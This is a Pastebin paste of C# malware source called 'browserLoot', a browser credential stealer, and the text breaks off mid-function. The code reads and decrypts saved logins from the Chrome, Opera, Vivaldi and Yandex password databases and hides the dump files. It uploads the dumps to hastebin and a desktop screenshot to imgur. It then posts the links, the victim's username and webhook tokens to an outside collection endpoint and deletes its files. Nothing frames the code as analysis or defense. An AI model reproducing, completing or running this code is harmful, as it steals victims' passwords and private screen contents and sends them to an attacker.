Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- using System;
- using System.Collections.Specialized;
- using System.Drawing;
- using System.Drawing.Imaging;
- using System.IO;
- using System.IO.Compression;
- using System.Net;
- using System.Runtime.InteropServices;
- using System.Text;
- using System.Text.RegularExpressions;
- using System.Windows.Forms;
- using Microsoft.VisualBasic;
- using Microsoft.VisualBasic.CompilerServices;
- namespace browserLoot
- {
- public static class Program
- {
- public static string FnChrome = Guid.NewGuid() + "_chrome.txt";
- public static string FnOpera = Guid.NewGuid() + "_opera.txt";
- public static string FnVivaldi = Guid.NewGuid() + "_vivaldi.txt";
- public static string FnYandex = Guid.NewGuid() + "_yandex.txt";
- private static readonly string VictimName = Environment.UserName;
- private static string ChromeUploadUri { get; set; }
- private static string OperaUploadUri { get; set; }
- private static string VivaldiUploadUri { get; set; }
- private static string YandexUploadUri { get; set; }
- private static string ScreenshotUploadUri { get; set; }
- [STAThread]
- private static void Main()
- {
- var webhookId = "//WEBHOOK ID//";
- var webhookToken = "//WEBHOOK TOKEN//";
- if (webhookId.Contains("//") || webhookToken.Contains("//"))
- Environment.Exit(0);
- DeleteFiles();
- var recoveryClass = new Recovery();
- recoveryClass.Chrome();
- recoveryClass.Opera();
- recoveryClass.Vivaldi();
- recoveryClass.Yandex();
- HideFiles();
- UploadFiles();
- DeleteFiles();
- TakeScreenshot();
- SendLinks(webhookId, webhookToken);
- }
- #region " File Handling "
- private static void DeleteFiles()
- {
- if (File.Exists(FnChrome))
- File.Delete(FnChrome);
- if (File.Exists(FnOpera))
- File.Delete(FnOpera);
- if (File.Exists(FnVivaldi))
- File.Delete(FnVivaldi);
- if (File.Exists(FnYandex))
- File.Delete(FnYandex);
- }
- private static void HideFiles()
- {
- if (File.Exists(FnChrome))
- {
- File.GetAttributes(FnChrome);
- File.SetAttributes(FnChrome, File.GetAttributes(FnChrome) | FileAttributes.Hidden);
- }
- if (File.Exists(FnOpera))
- {
- File.GetAttributes(FnOpera);
- File.SetAttributes(FnOpera, File.GetAttributes(FnOpera) | FileAttributes.Hidden);
- }
- if (File.Exists(FnVivaldi))
- {
- File.GetAttributes(FnVivaldi);
- File.SetAttributes(FnVivaldi, File.GetAttributes(FnVivaldi) | FileAttributes.Hidden);
- }
- if (File.Exists(FnYandex))
- {
- File.GetAttributes(FnYandex);
- File.SetAttributes(FnYandex, File.GetAttributes(FnYandex) | FileAttributes.Hidden);
- }
- }
- #endregion
- #region " Screenshot Handling "
- private static bool UploadValues(WebClient w, string idImgur)
- {
- w.Headers.Add("Authorization", "Client-ID " + idImgur);
- return true;
- }
- private static void TakeScreenshot()
- {
- if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots"))
- {
- Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots",
- true);
- Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) +
- @"\Screenshots");
- var screenshot = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots\" +
- "[" + DateTime.Now.ToString().Replace(':', ' ').Replace('/', ' ') + "].png";
- var bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height,
- PixelFormat.Format32bppArgb);
- var gfxScreenshot = Graphics.FromImage(bmpScreenshot);
- gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X, Screen.PrimaryScreen.Bounds.Y, 0, 0,
- Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);
- bmpScreenshot.Save(screenshot, ImageFormat.Png);
- var sLink = string.Empty;
- var values = new NameValueCollection
- {
- {"image", Convert.ToBase64String(File.ReadAllBytes(screenshot))},
- {"title", Path.GetFileNameWithoutExtension(screenshot)}
- };
- using (var w = new WebClient())
- {
- if (UploadValues(w, "23c111099c786a9"))
- using (var sr =
- new StreamReader(
- new MemoryStream(w.UploadValues(new Uri("https://api.imgur.com/3/upload.xml"),
- values))))
- {
- sLink = sr.ReadToEnd();
- }
- }
- if (!string.IsNullOrEmpty(sLink))
- {
- ScreenshotUploadUri = new Regex(@"<link>(.*?)</link>", RegexOptions.Multiline).Match(sLink)
- .Groups[1]
- .Value.Trim();
- Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots",
- true);
- }
- }
- else
- {
- Directory.CreateDirectory(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) +
- @"\Screenshots");
- var screenshot = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots\" +
- "[" + DateTime.Now.ToString().Replace(':', ' ').Replace('/', ' ') + "].png";
- var bmpScreenshot = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height,
- PixelFormat.Format32bppArgb);
- var gfxScreenshot = Graphics.FromImage(bmpScreenshot);
- gfxScreenshot.CopyFromScreen(Screen.PrimaryScreen.Bounds.X, Screen.PrimaryScreen.Bounds.Y, 0, 0,
- Screen.PrimaryScreen.Bounds.Size, CopyPixelOperation.SourceCopy);
- bmpScreenshot.Save(screenshot, ImageFormat.Png);
- var sLink = string.Empty;
- var values = new NameValueCollection
- {
- {"image", Convert.ToBase64String(File.ReadAllBytes(screenshot))},
- {"title", Path.GetFileNameWithoutExtension(screenshot)}
- };
- using (var w = new WebClient())
- {
- if (UploadValues(w, "23c111099c786a9"))
- using (var sr =
- new StreamReader(
- new MemoryStream(w.UploadValues(new Uri("https://api.imgur.com/3/upload.xml"),
- values))))
- {
- sLink = sr.ReadToEnd();
- }
- }
- if (!string.IsNullOrEmpty(sLink))
- {
- ScreenshotUploadUri = new Regex(@"<link>(.*?)</link>", RegexOptions.Multiline).Match(sLink)
- .Groups[1]
- .Value.Trim();
- Directory.Delete(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\Screenshots",
- true);
- }
- }
- }
- #endregion
- #region " Server Handling "
- private static void UploadFiles()
- {
- if (File.Exists(FnChrome))
- using (var sr = new StreamReader(FnChrome))
- {
- var line = sr.ReadToEnd();
- if (line.Contains("V3rmillion"))
- Environment.Exit(0);
- using (var webClient = new WebClient())
- {
- webClient.Proxy = null;
- webClient.Headers.Add("content-type", "text/plain");
- webClient.Headers.Add("user-agent",
- "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
- var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
- ChromeUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
- .Replace("\"}", "").Replace(" ", "").Replace("{", "");
- }
- }
- if (File.Exists(FnVivaldi))
- using (var sr = new StreamReader(FnVivaldi))
- {
- var line = sr.ReadToEnd();
- if (line.Contains("V3rmillion"))
- Environment.Exit(0);
- using (var webClient = new WebClient())
- {
- webClient.Proxy = null;
- webClient.Headers.Add("content-type", "text/plain");
- webClient.Headers.Add("user-agent",
- "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
- var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
- VivaldiUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
- .Replace("\"}", "").Replace(" ", "").Replace("{", "");
- }
- }
- if (File.Exists(FnOpera))
- using (var sr = new StreamReader(FnOpera))
- {
- var line = sr.ReadToEnd();
- if (line.Contains("V3rmillion"))
- Environment.Exit(0);
- using (var webClient = new WebClient())
- {
- webClient.Proxy = null;
- webClient.Headers.Add("content-type", "text/plain");
- webClient.Headers.Add("user-agent",
- "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
- var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
- OperaUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
- .Replace("\"}", "").Replace(" ", "").Replace("{", "");
- }
- }
- if (File.Exists(FnYandex))
- using (var sr = new StreamReader(FnYandex))
- {
- var line = sr.ReadToEnd();
- if (line.Contains("V3rmillion"))
- Environment.Exit(0);
- using (var webClient = new WebClient())
- {
- webClient.Proxy = null;
- webClient.Headers.Add("content-type", "text/plain");
- webClient.Headers.Add("user-agent",
- "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36");
- var webResponse = webClient.UploadString("https://hastebin.com/documents", "POST", line);
- YandexUploadUri = "https://hastebin.com/" + webResponse.Replace("\"key\":\"", "")
- .Replace("\"}", "").Replace(" ", "").Replace("{", "");
- }
- }
- }
- public static void SendLinks(string webhookId, string webhookToken)
- {
- using (var webClient = new WebClient())
- {
- if (ChromeUploadUri == null)
- ChromeUploadUri = "Not installed.";
- if (VivaldiUploadUri == null)
- VivaldiUploadUri = "Not installed.";
- if (OperaUploadUri == null)
- OperaUploadUri = "Not installed.";
- if (YandexUploadUri == null)
- YandexUploadUri = "Not installed.";
- var postQuery =
- "ChromeUploadUri=" + ChromeUploadUri +"&VivaldiUploadUri=" + VivaldiUploadUri + "&OperaUploadUri=" + OperaUploadUri + "&YandexUploadUri=" + YandexUploadUri + "&VictimName=" + VictimName + "&webhookId=" + webhookId + "&webhookToken=" + webhookToken + "&ScreenshotUploadUri=" + ScreenshotUploadUri;
- webClient.Proxy = null;
- webClient.Headers.Add("content-type", "application/x-www-form-urlencoded");
- webClient.UploadString("https://www.ezlib.rocks/customapi/Gz6l7Re31r/SendLinks", "POST", postQuery);
- }
- }
- #endregion
- }
- // USG HERE 1
- #region " Database "
- public class SqliteHandler
- {
- private readonly byte[] db_bytes;
- private readonly ulong encoding;
- private readonly ushort page_size;
- private readonly byte[] SQLDataTypeSize = {0, 1, 2, 3, 4, 6, 8, 8, 0, 0};
- private string[] field_names;
- private sqlite_master_entry[] master_table_entries;
- private table_entry[] table_entries;
- public SqliteHandler(string baseName)
- {
- if (File.Exists(baseName))
- {
- FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
- var str = Strings.Space((int) FileSystem.LOF(1));
- FileSystem.FileGet(1, ref str, -1L, false);
- FileSystem.FileClose(1);
- db_bytes = Encoding.Default.GetBytes(str);
- if (Encoding.Default.GetString(db_bytes, 0, 15).CompareTo("SQLite format 3") != 0)
- throw new Exception("Not a valid SQLite 3 Database File");
- if (db_bytes[0x34] != 0)
- throw new Exception("Auto-vacuum capable database is not supported");
- page_size = (ushort) ConvertToInteger(0x10, 2);
- encoding = ConvertToInteger(0x38, 4);
- if (decimal.Compare(new decimal(encoding), decimal.Zero) == 0)
- encoding = 1L;
- ReadMasterTable(100L);
- }
- }
- private ulong ConvertToInteger(int startIndex, int Size)
- {
- if ((Size > 8) | (Size == 0))
- return 0L;
- ulong num2 = 0L;
- var num4 = Size - 1;
- for (var i = 0; i <= num4; i++)
- num2 = (num2 << 8) | db_bytes[startIndex + i];
- return num2;
- }
- private long CVL(int startIndex, int endIndex)
- {
- endIndex++;
- var buffer = new byte[8];
- var num4 = endIndex - startIndex;
- var flag = false;
- if ((num4 == 0) | (num4 > 9))
- return 0L;
- if (num4 == 1)
- {
- buffer[0] = (byte) (db_bytes[startIndex] & 0x7f);
- return BitConverter.ToInt64(buffer, 0);
- }
- if (num4 == 9)
- flag = true;
- var num2 = 1;
- var num3 = 7;
- var index = 0;
- if (flag)
- {
- buffer[0] = db_bytes[endIndex - 1];
- endIndex--;
- index = 1;
- }
- var num7 = startIndex;
- for (var i = endIndex - 1; i >= num7; i += -1)
- if (i - 1 >= startIndex)
- {
- buffer[index] = (byte) (((byte) (db_bytes[i] >> ((num2 - 1) & 7)) & (0xff >> num2)) |
- (byte) (db_bytes[i - 1] << (num3 & 7)));
- num2++;
- index++;
- num3--;
- }
- else if (!flag)
- {
- buffer[index] = (byte) ((byte) (db_bytes[i] >> ((num2 - 1) & 7)) & (0xff >> num2));
- }
- return BitConverter.ToInt64(buffer, 0);
- }
- public int GetRowCount()
- {
- return table_entries.Length;
- }
- public string[] GetTableNames()
- {
- string[] strArray2 = null;
- var index = 0;
- var num3 = master_table_entries.Length - 1;
- for (var i = 0; i <= num3; i++)
- if (master_table_entries[i].item_type == "table")
- {
- strArray2 = (string[]) Utils.CopyArray(strArray2, new string[index + 1]);
- strArray2[index] = master_table_entries[i].item_name;
- index++;
- }
- return strArray2;
- }
- public string GetValue(int row_num, int field)
- {
- if (row_num >= table_entries.Length)
- return null;
- if (field >= table_entries[row_num].content.Length)
- return null;
- return table_entries[row_num].content[field];
- }
- public string GetValue(int row_num, string field)
- {
- var num = -1;
- var length = field_names.Length - 1;
- for (var i = 0; i <= length; i++)
- if (field_names[i].ToLower().CompareTo(field.ToLower()) == 0)
- {
- num = i;
- break;
- }
- if (num == -1)
- return null;
- return GetValue(row_num, num);
- }
- private int GVL(int startIndex)
- {
- if (startIndex > db_bytes.Length)
- return 0;
- var num3 = startIndex + 8;
- for (var i = startIndex; i <= num3; i++)
- {
- if (i > db_bytes.Length - 1)
- return 0;
- if ((db_bytes[i] & 0x80) != 0x80)
- return i;
- }
- return startIndex + 8;
- }
- private bool IsOdd(long value)
- {
- return (value & 1L) == 1L;
- }
- private void ReadMasterTable(ulong Offset)
- {
- if (db_bytes[(int) Offset] == 13)
- {
- var num2 = Convert.ToUInt16(
- decimal.Subtract(
- new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
- decimal.One));
- var length = 0;
- if (master_table_entries != null)
- {
- length = master_table_entries.Length;
- master_table_entries = (sqlite_master_entry[]) Utils.CopyArray(master_table_entries,
- new sqlite_master_entry[master_table_entries.Length + num2 + 1]);
- }
- else
- {
- master_table_entries = new sqlite_master_entry[num2 + 1];
- }
- int num13 = num2;
- for (var i = 0; i <= num13; i++)
- {
- var num = ConvertToInteger(
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2);
- if (decimal.Compare(new decimal(Offset), 100M) != 0)
- num += Offset;
- var endIndex = GVL((int) num);
- var num7 = CVL((int) num, endIndex);
- var num6 = GVL(Convert.ToInt32(
- decimal.Add(
- decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))),
- decimal.One)));
- master_table_entries[length + i].row_id =
- CVL(
- Convert.ToInt32(decimal.Add(
- decimal.Add(new decimal(num),
- decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num6);
- num = Convert.ToUInt64(decimal.Add(
- decimal.Add(new decimal(num), decimal.Subtract(new decimal(num6), new decimal(num))),
- decimal.One));
- endIndex = GVL((int) num);
- num6 = endIndex;
- var num5 = CVL((int) num, endIndex);
- var numArray = new long[5];
- var index = 0;
- do
- {
- endIndex = num6 + 1;
- num6 = GVL(endIndex);
- numArray[index] = CVL(endIndex, num6);
- if (numArray[index] > 9L)
- if (IsOdd(numArray[index]))
- numArray[index] = (long) Math.Round((numArray[index] - 13L) / 2.0);
- else
- numArray[index] = (long) Math.Round((numArray[index] - 12L) / 2.0);
- else
- numArray[index] = SQLDataTypeSize[(int) numArray[index]];
- index++;
- } while (index <= 4);
- if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
- master_table_entries[length + i].item_type = Encoding.Default.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int) numArray[0]);
- else if (decimal.Compare(new decimal(encoding), 2M) == 0)
- master_table_entries[length + i].item_type = Encoding.Unicode.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int) numArray[0]);
- else if (decimal.Compare(new decimal(encoding), 3M) == 0)
- master_table_entries[length + i].item_type = Encoding.BigEndianUnicode.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int) numArray[0]);
- if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
- master_table_entries[length + i].item_name = Encoding.Default.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
- new decimal(numArray[0]))), (int) numArray[1]);
- else if (decimal.Compare(new decimal(encoding), 2M) == 0)
- master_table_entries[length + i].item_name = Encoding.Unicode.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
- new decimal(numArray[0]))), (int) numArray[1]);
- else if (decimal.Compare(new decimal(encoding), 3M) == 0)
- master_table_entries[length + i].item_name = Encoding.BigEndianUnicode.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
- new decimal(numArray[0]))), (int) numArray[1]);
- master_table_entries[length + i].root_num =
- (long) ConvertToInteger(
- Convert.ToInt32(decimal.Add(
- decimal.Add(
- decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
- new decimal(numArray[0])), new decimal(numArray[1])),
- new decimal(numArray[2]))), (int) numArray[3]);
- if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
- master_table_entries[length + i].sql_statement = Encoding.Default.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(
- decimal.Add(
- decimal.Add(
- decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
- new decimal(numArray[0])), new decimal(numArray[1])),
- new decimal(numArray[2])), new decimal(numArray[3]))), (int) numArray[4]);
- else if (decimal.Compare(new decimal(encoding), 2M) == 0)
- master_table_entries[length + i].sql_statement = Encoding.Unicode.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(
- decimal.Add(
- decimal.Add(
- decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
- new decimal(numArray[0])), new decimal(numArray[1])),
- new decimal(numArray[2])), new decimal(numArray[3]))), (int) numArray[4]);
- else if (decimal.Compare(new decimal(encoding), 3M) == 0)
- master_table_entries[length + i].sql_statement = Encoding.BigEndianUnicode.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(
- decimal.Add(
- decimal.Add(
- decimal.Add(decimal.Add(new decimal(num), new decimal(num5)),
- new decimal(numArray[0])), new decimal(numArray[1])),
- new decimal(numArray[2])), new decimal(numArray[3]))), (int) numArray[4]);
- }
- }
- else if (db_bytes[(int) Offset] == 5)
- {
- var num11 = Convert.ToUInt16(
- decimal.Subtract(
- new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
- decimal.One));
- int num14 = num11;
- for (var j = 0; j <= num14; j++)
- {
- var startIndex =
- (ushort) ConvertToInteger(
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(j * 2))), 2);
- if (decimal.Compare(new decimal(Offset), 100M) == 0)
- ReadMasterTable(Convert.ToUInt64(
- decimal.Multiply(
- decimal.Subtract(new decimal(ConvertToInteger(startIndex, 4)), decimal.One),
- new decimal(page_size))));
- else
- ReadMasterTable(Convert.ToUInt64(
- decimal.Multiply(
- decimal.Subtract(new decimal(ConvertToInteger((int) (Offset + startIndex), 4)),
- decimal.One), new decimal(page_size))));
- }
- ReadMasterTable(Convert.ToUInt64(
- decimal.Multiply(
- decimal.Subtract(
- new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)),
- decimal.One), new decimal(page_size))));
- }
- }
- public bool ReadTable(string TableName)
- {
- var index = -1;
- var length = master_table_entries.Length - 1;
- for (var i = 0; i <= length; i++)
- if (master_table_entries[i].item_name.ToLower().CompareTo(TableName.ToLower()) == 0)
- {
- index = i;
- break;
- }
- if (index == -1)
- return false;
- var strArray = master_table_entries[index].sql_statement
- .Substring(master_table_entries[index].sql_statement.IndexOf("(") + 1).Split(',');
- var num6 = strArray.Length - 1;
- for (var j = 0; j <= num6; j++)
- {
- strArray[j] = strArray[j].TrimStart();
- var num4 = strArray[j].IndexOf(" ");
- if (num4 > 0)
- strArray[j] = strArray[j].Substring(0, num4);
- if (strArray[j].IndexOf("UNIQUE") == 0)
- break;
- field_names = (string[]) Utils.CopyArray(field_names, new string[j + 1]);
- field_names[j] = strArray[j];
- }
- return ReadTableFromOffset((ulong) ((master_table_entries[index].root_num - 1L) * page_size));
- }
- private bool ReadTableFromOffset(ulong Offset)
- {
- if (db_bytes[(int) Offset] == 13)
- {
- var num2 = Convert.ToInt32(decimal.Subtract(
- new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
- decimal.One));
- var length = 0;
- if (table_entries != null)
- {
- length = table_entries.Length;
- table_entries =
- (table_entry[]) Utils.CopyArray(table_entries,
- new table_entry[table_entries.Length + num2 + 1]);
- }
- else
- {
- table_entries = new table_entry[num2 + 1];
- }
- var num16 = num2;
- for (var i = 0; i <= num16; i++)
- {
- record_header_field[] _fieldArray = null;
- var num = ConvertToInteger(
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2);
- if (decimal.Compare(new decimal(Offset), 100M) != 0)
- num += Offset;
- var endIndex = GVL((int) num);
- var num9 = CVL((int) num, endIndex);
- var num8 = GVL(Convert.ToInt32(
- decimal.Add(
- decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))),
- decimal.One)));
- table_entries[length + i].row_id =
- CVL(
- Convert.ToInt32(decimal.Add(
- decimal.Add(new decimal(num),
- decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num8);
- num = Convert.ToUInt64(decimal.Add(
- decimal.Add(new decimal(num), decimal.Subtract(new decimal(num8), new decimal(num))),
- decimal.One));
- endIndex = GVL((int) num);
- num8 = endIndex;
- var num7 = CVL((int) num, endIndex);
- var num10 = Convert.ToInt64(decimal.Add(decimal.Subtract(new decimal(num), new decimal(endIndex)),
- decimal.One));
- for (var j = 0; num10 < num7; j++)
- {
- _fieldArray =
- (record_header_field[]) Utils.CopyArray(_fieldArray, new record_header_field[j + 1]);
- endIndex = num8 + 1;
- num8 = GVL(endIndex);
- _fieldArray[j].type = CVL(endIndex, num8);
- if (_fieldArray[j].type > 9L)
- if (IsOdd(_fieldArray[j].type))
- _fieldArray[j].size = (long) Math.Round((_fieldArray[j].type - 13L) / 2.0);
- else
- _fieldArray[j].size = (long) Math.Round((_fieldArray[j].type - 12L) / 2.0);
- else
- _fieldArray[j].size = SQLDataTypeSize[(int) _fieldArray[j].type];
- num10 = num10 + (num8 - endIndex) + 1L;
- }
- table_entries[length + i].content = new string[_fieldArray.Length - 1 + 1];
- var num4 = 0;
- var num17 = _fieldArray.Length - 1;
- for (var k = 0; k <= num17; k++)
- {
- if (_fieldArray[k].type > 9L)
- if (!IsOdd(_fieldArray[k].type))
- {
- if (decimal.Compare(new decimal(encoding), decimal.One) == 0)
- table_entries[length + i].content[k] = Encoding.Default.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
- new decimal(num4))), (int) _fieldArray[k].size);
- else if (decimal.Compare(new decimal(encoding), 2M) == 0)
- table_entries[length + i].content[k] = Encoding.Unicode.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
- new decimal(num4))), (int) _fieldArray[k].size);
- else if (decimal.Compare(new decimal(encoding), 3M) == 0)
- table_entries[length + i].content[k] = Encoding.BigEndianUnicode.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
- new decimal(num4))), (int) _fieldArray[k].size);
- }
- else
- {
- table_entries[length + i].content[k] = Encoding.Default.GetString(db_bytes,
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
- new decimal(num4))), (int) _fieldArray[k].size);
- }
- else
- table_entries[length + i].content[k] =
- Conversions.ToString(
- ConvertToInteger(
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)),
- new decimal(num4))), (int) _fieldArray[k].size));
- num4 += (int) _fieldArray[k].size;
- }
- }
- }
- else if (db_bytes[(int) Offset] == 5)
- {
- var num14 = Convert.ToUInt16(
- decimal.Subtract(
- new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)),
- decimal.One));
- int num18 = num14;
- for (var m = 0; m <= num18; m++)
- {
- var num13 = (ushort) ConvertToInteger(
- Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(m * 2))), 2);
- ReadTableFromOffset(Convert.ToUInt64(
- decimal.Multiply(
- decimal.Subtract(new decimal(ConvertToInteger((int) (Offset + num13), 4)), decimal.One),
- new decimal(page_size))));
- }
- ReadTableFromOffset(Convert.ToUInt64(
- decimal.Multiply(
- decimal.Subtract(
- new decimal(ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)),
- decimal.One), new decimal(page_size))));
- }
- return true;
- }
- [StructLayout(LayoutKind.Sequential)]
- private struct record_header_field
- {
- public long size;
- public long type;
- }
- [StructLayout(LayoutKind.Sequential)]
- private struct sqlite_master_entry
- {
- public long row_id;
- public string item_type;
- public string item_name;
- public readonly string astable_name;
- public long root_num;
- public string sql_statement;
- }
- [StructLayout(LayoutKind.Sequential)]
- private struct table_entry
- {
- public long row_id;
- public string[] content;
- }
- }
- #endregion
- // USG HERE 2
- #region " Recovery "
- public class Recovery
- {
- public void Chrome()
- {
- var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
- "\\Google\\Chrome\\User Data\\Default\\Login Data";
- var searchTerm = string.Empty;
- var data = string.Empty;
- try
- {
- var sqlDatabase = new SqliteHandler(installationPath);
- sqlDatabase.ReadTable("logins");
- if (File.Exists(installationPath))
- for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
- try
- {
- var host = sqlDatabase.GetValue(i, "origin_url");
- var user = sqlDatabase.GetValue(i, "username_value");
- var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
- if (user != "" && pass != "")
- if (pass != "FAIL")
- if (host.Contains(searchTerm) || searchTerm == "**ALL**")
- data =
- "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
- string[] totalStrings = {data + "\r\nCopyright 2017 browserLoot."};
- using (var writePasswords = new StreamWriter(Program.FnChrome))
- {
- foreach (var line in totalStrings)
- writePasswords.WriteLine(line);
- }
- }
- catch
- {
- Environment.Exit(0);
- }
- }
- catch
- {
- Environment.Exit(0);
- }
- }
- public void Opera()
- {
- var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) +
- "\\Opera Software\\Opera Stable\\Login Data";
- var searchTerm = string.Empty;
- var data = string.Empty;
- try
- {
- var sqlDatabase = new SqliteHandler(installationPath);
- sqlDatabase.ReadTable("logins");
- if (File.Exists(installationPath))
- for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
- try
- {
- var host = sqlDatabase.GetValue(i, "origin_url");
- var user = sqlDatabase.GetValue(i, "username_value");
- var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
- if (user != "" && pass != "")
- if (pass != "FAIL")
- if (host.Contains(searchTerm) || searchTerm == "**ALL**")
- data =
- "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
- string[] totalStrings = { data + "\r\nCopyright 2017 browserLoot." };
- using (var writePasswords = new StreamWriter(Program.FnOpera))
- {
- foreach (var line in totalStrings)
- writePasswords.WriteLine(line);
- }
- }
- catch
- {
- Environment.Exit(0);
- }
- }
- catch
- {
- Environment.Exit(0);
- }
- }
- public void Vivaldi()
- {
- var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
- "\\Vivaldi\\User Data\\Default\\Login Data";
- var searchTerm = string.Empty;
- var data = string.Empty;
- try
- {
- var sqlDatabase = new SqliteHandler(installationPath);
- sqlDatabase.ReadTable("logins");
- if (File.Exists(installationPath))
- for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
- try
- {
- var host = sqlDatabase.GetValue(i, "origin_url");
- var user = sqlDatabase.GetValue(i, "username_value");
- var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
- if (user != "" && pass != "")
- if (pass != "FAIL")
- if (host.Contains(searchTerm) || searchTerm == "**ALL**")
- data =
- data =
- "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
- string[] totalStrings = { data + "\r\nCopyright 2017 browserLoot." };
- using (var writePasswords = new StreamWriter(Program.FnVivaldi))
- {
- foreach (var line in totalStrings)
- writePasswords.WriteLine(line);
- }
- }
- catch
- {
- Environment.Exit(0);
- }
- }
- catch
- {
- Environment.Exit(0);
- }
- }
- public void Yandex()
- {
- var installationPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) +
- "\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data";
- var searchTerm = string.Empty;
- var data = string.Empty;
- try
- {
- var sqlDatabase = new SqliteHandler(installationPath);
- sqlDatabase.ReadTable("logins");
- if (File.Exists(installationPath))
- for (var i = 0; i <= sqlDatabase.GetRowCount() - 1; i++)
- try
- {
- var host = sqlDatabase.GetValue(i, "origin_url");
- var user = sqlDatabase.GetValue(i, "username_value");
- var pass = Decrypt(Encoding.Default.GetBytes(sqlDatabase.GetValue(i, "password_value")));
- if (user != "" && pass != "")
- if (pass != "FAIL")
- if (host.Contains(searchTerm) || searchTerm == "**ALL**")
- data =
- "Host: " + host + "\r\nEmail Address/Username: " + user + "\r\nPassword: " + pass + "\r\n";
